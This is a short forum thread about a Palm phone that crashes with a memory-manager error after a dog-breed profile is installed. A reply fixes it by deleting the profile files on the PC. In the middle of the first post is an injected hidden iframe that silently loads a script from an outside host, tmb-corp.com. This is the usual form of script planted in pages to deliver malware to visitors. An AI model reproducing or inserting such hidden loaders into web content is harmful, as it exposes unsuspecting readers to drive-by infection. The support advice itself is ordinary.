Someone help please! I recently downloaded profile on purebreed dogs from AKC.org for my phone. Everytime I try and access my palm menu (the little house) i get this error message:

MemoryMgr.c,Line4450, Invalid chunk ptr

and it make me reset my phone.

How do I fix this?

Is there a way make only certain ideas hotsunc to my phone if I do a hard reset? That way I could put my other programs back on my phone and remove the offending software w/o losing my address book.

I've already tried this method, but w/o the ability to remove the bad software it does the same thing.

Incidentally, the phone still works and I can use all of my hard keys. I can't use my main menu.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

go into your PC's files and remove them from your profile. I forget the exact directory offhand but it'll be something like c:\program files\palm desktop\profile\<profilename>\

Thanks. That fixed the problem. I e-mailed the webmaster for their site to let them know they have corrupted software.
